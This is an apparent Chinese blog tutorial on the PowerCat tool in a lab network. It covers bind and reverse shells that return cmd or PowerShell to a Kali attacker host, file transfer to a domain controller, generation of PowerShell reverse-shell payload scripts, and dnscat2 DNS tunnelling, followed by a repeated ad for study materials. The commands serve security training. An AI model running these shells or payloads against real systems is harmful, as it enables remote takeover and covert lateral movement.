【渗透测试笔记】之【内网渗透——传输层隧道(PowerCat的使用:正反向shell、文件传输

文章目录

1 实验环境

kali(攻击机,外网地址:192.168.8.48)
Windows2012(边界服务器,外网地址:192.168.8.57,内网地址:10.1.1.10)
CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)
DC(内网地址:10.1.1.2)
在这里插入图片描述

2 下载与部署

2.1 下载

下载地址:https://github.com/besimorhino/powercat

2.2 导入

Import-Module .\powercat.ps1

可能会出现ps权限不足的情况:
在这里插入图片描述
修改ps权限后再导入(需要管理员权限):

Set-ExecutionPolicy Unrestricted
y
Import-Module .\powercat.ps1

在这里插入图片描述

3 使用方法

3.1 nc 正向连接PowerCat

3.1.1 边界服务器

Windows2012(边界服务器,外网地址:192.168.8.57,内网地址:10.1.1.10)

powercat -l -p 4444 -e cmd.exe -v
# 监听4444端口
powercat -l -p 4444 -ep -v
# 回连powershell

在这里插入图片描述

3.1.2 攻击机

kali(攻击机,外网地址:192.168.8.48)

nc 192.168.8.57 4444 -vv

在这里插入图片描述

3.2 PowerCat 反向连接nc

3.2.1 攻击机

kali(攻击机,外网地址:192.168.8.48)

nc -l -p 4444 -vv
# 监听4444端口

在这里插入图片描述

3.2.2 边界服务器

Windows2012(边界服务器,外网地址:192.168.8.57,内网地址:10.1.1.10)

powercat -c 192.168.8.48 -p 4444 -v -e cmd.exe
# 返回cmd
powercat -c 192.168.8.48 -p 4444 -v -ep
# 返回powershell

返回cmd:
在这里插入图片描述
kali上成功接收:
在这里插入图片描述
返回powershell:
在这里插入图片描述

在这里插入图片描述

3.3 文件传输

3.3.1 接收方

DC(内网地址:10.1.1.2)

powercat -l -p 4444 -of C:\Windows\Temp\1.txt -v
# -of:文件储存位置及名称

在这里插入图片描述

3.3.2 发送方
边界服务器

Windows2012(边界服务器,外网地址:192.168.8.57,内网地址:10.1.1.10)

powercat -c 10.1.1.2 -p 4444 -i C:\Windows\Temp\1.txt -v
# -i:文件发送路径及名称

在这里插入图片描述
可在里面追加内容,如果不需要追加,Ctrl+C传输结束。

3.4 生成PowerShell payload

连接方式同上,正向nc连接powercat,反向powercat反弹到nc。只是将受害机的执行方式变为了ps脚本。
主要用到的参数:

-g:生成powershell payload
-ge:生成经过编码的payload
# 经过编码的payload利用方式:powershell -E 编码后的payload

3.4.1 正向shell
  1. 生成payload:
powercat -l -p 4444 -e cmd.exe -v -g >> shell.ps1
# -p指定监听端口

在这里插入图片描述

  1. 在受害机执行payload:
    在这里插入图片描述
  2. kali正向连接:
nc 192.168.8.57 4444 -vv

在这里插入图片描述

3.4.2 反弹shell
  1. kali开启监听
nc -l -p 4444 -vv

在这里插入图片描述

  1. 生成反弹shell payload:
powercat -c 192.168.8.48 -p 4444 -v -e cmd.exe -g >> shell.ps1

在这里插入图片描述
3. 执行payload:
在这里插入图片描述
在这里插入图片描述

3.5 PowerCat DNS 隧道通信

powercat的dns通信服务端是基于dnscat设计的,所以需要先安装服务端。

3.5.1 下载与部署

dnscat下载地址:https://github.com/iagox86/dnscat2/tags

kali(攻击机,外网地址:192.168.8.48)

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
gem install bundler
bundle install

在这里插入图片描述

3.5.2 使用方法
攻击机

kali(攻击机,外网地址:192.168.8.48)

ruby dnscat2.rb ttpowercat.test -e open --no-cache

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

-1715569190003)]

[外链图片转存中…(img-wGeOMNKu-1715569190003)]

[外链图片转存中…(img-h60g609G-1715569190003)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值